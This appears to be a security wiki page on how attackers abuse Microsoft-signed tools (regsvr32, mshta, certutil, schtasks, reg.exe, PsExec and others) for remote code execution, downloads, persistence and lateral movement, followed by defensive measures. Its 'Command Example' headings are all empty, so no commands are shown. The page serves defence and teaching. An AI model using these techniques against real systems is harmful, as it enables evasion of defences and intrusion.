EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (LOLBAS) in Elevation of Privilege (EoP)
Overview
Living Off The Land Binaries and Scripts (LOLBAS) refer to the use of legitimate Microsoft-signed binaries, scripts, and libraries to perform unintended, powerful actions. These tools, collectively referred to as LOLBins, LOLScripts, and LOLLibs, can bypass traditional security measures, facilitate privilege escalation, and maintain persistence without relying on external malware.
Purpose of LOLBAS in Attacks
Attackers exploit LOLBAS to:
Evade detection by blending malicious activities with legitimate system processes.
Bypass security mechanisms such as application whitelisting and antivirus.
Persist on compromised systems using trusted tools to avoid raising alarms.
Criteria for LOLBin, LOLScript, and LOLLib Entries
Microsoft-Signed: Must be signed by Microsoft and either pre-installed or available through official Microsoft channels.
Unexpected Functionality: Provides capabilities beyond its documented purpose.
APT Relevance: Demonstrates value to Advanced Persistent Threat (APT) groups, red teams, or penetration testers.
Common Techniques and Examples
1. Process Execution Using wmic.exe
wmic.exeDescription: Executes processes and manages system configurations via Windows Management Instrumentation (WMI).
Command Example:
Purpose: Executes calc.exe or other binaries stealthily, avoiding the need for new binaries.
Security Implication: Avoids detection by security systems that monitor new file execution.
2. Remote Code Execution with regsvr32.exe
regsvr32.exeDescription: Designed for COM object registration, but can load and execute remote scripts.
Command Example:
Purpose: Executes remote code by loading scripts, bypassing download restrictions.
Security Implication: Bypasses application control and runs code via a trusted binary.
3. File Compilation Using Microsoft.Workflow.Compiler.exe
Microsoft.Workflow.Compiler.exeDescription: Compiles workflows but can be used to process and execute unintended payloads.
Command Example:
Purpose: Leverages malicious XML to trigger code execution.
Security Implication: A stealthy approach for executing unauthorized workflows.
4. PowerShell Execution via mshta.exe
mshta.exeDescription: Executes HTML applications but can run PowerShell commands through JavaScript.
Command Example:
Purpose: Executes PowerShell commands within a JavaScript payload.
Security Implication: Avoids detection by running malicious scripts through a trusted binary.
5. DLL Execution with rundll32.exe
rundll32.exeDescription: Loads and executes DLLs, often used for fileless attacks.
Command Example:
Purpose: Executes code entirely in memory, evading traditional antivirus.
Security Implication: Bypasses executable monitoring while maintaining stealth.
6. Scheduled Tasks via schtasks.exe
schtasks.exeDescription: Creates tasks to execute commands or scripts at specific times or system events.
Command Example:
Purpose: Establishes persistence through scheduled execution.
Security Implication: Stealthy task scheduling to evade detection.
7. File Downloads Using certutil.exe
certutil.exeDescription: Primarily for certificate management, but capable of downloading files.
Command Example:
Purpose: Downloads malicious files while appearing as legitimate network activity.
Security Implication: Evades detection by using a trusted binary for data transfer.
8. Code Execution with InstallUtil.exe
InstallUtil.exeDescription: Part of .NET Framework, executes .NET assemblies.
Command Example:
Purpose: Executes custom .NET code for stealthy payload delivery.
Security Implication: Avoids detection by running custom assemblies through a trusted binary.
9. Registry Persistence via reg.exe
reg.exeDescription: Modifies registry keys to execute commands or scripts during system startup.
Command Example:
Purpose: Ensures persistence by running malicious files at user login.
Security Implication: Registry-based persistence often goes unnoticed by security systems.
10. Lateral Movement with PsExec.exe
PsExec.exeDescription: Executes processes on remote systems.
Command Example:
Purpose: Facilitates lateral movement by running commands on remote systems.
Security Implication: If PsExec is allowed, it provides attackers easy lateral movement.
Defensive Strategies Against LOLBAS Techniques
1. Enhanced Logging and Monitoring
Use Sysmon or similar tools to log process creation, command-line arguments, and network activity.
Monitor execution of known LOLBins, especially with unusual parameters.
2. Application Control Policies
Implement AppLocker or Windows Defender Application Control (WDAC) to restrict usage of high-risk LOLBins.
Allow only pre-approved executables based on organizational requirements.
3. Binary and Script Restrictions
Remove or disable unneeded binaries such as
bitsadmin.exe,certutil.exe, andmshta.exe.Enforce script execution policies for PowerShell and other scripting environments.
4. Regular System Audits
Periodically audit installed binaries and scripts to ensure integrity.
Identify and remove unauthorized or outdated binaries.
5. Threat Hunting and Baseline Analysis
Establish activity baselines for LOLBin usage and detect deviations.
Proactively search for unusual command-line patterns or scheduled tasks.
Conclusion
The abuse of LOLBAS techniques presents a significant challenge in modern cybersecurity, allowing attackers to evade traditional defenses by leveraging trusted binaries. By understanding these methods and implementing robust defensive strategies, organizations can enhance their detection and mitigation capabilities against these stealthy attack vectors.
Last updated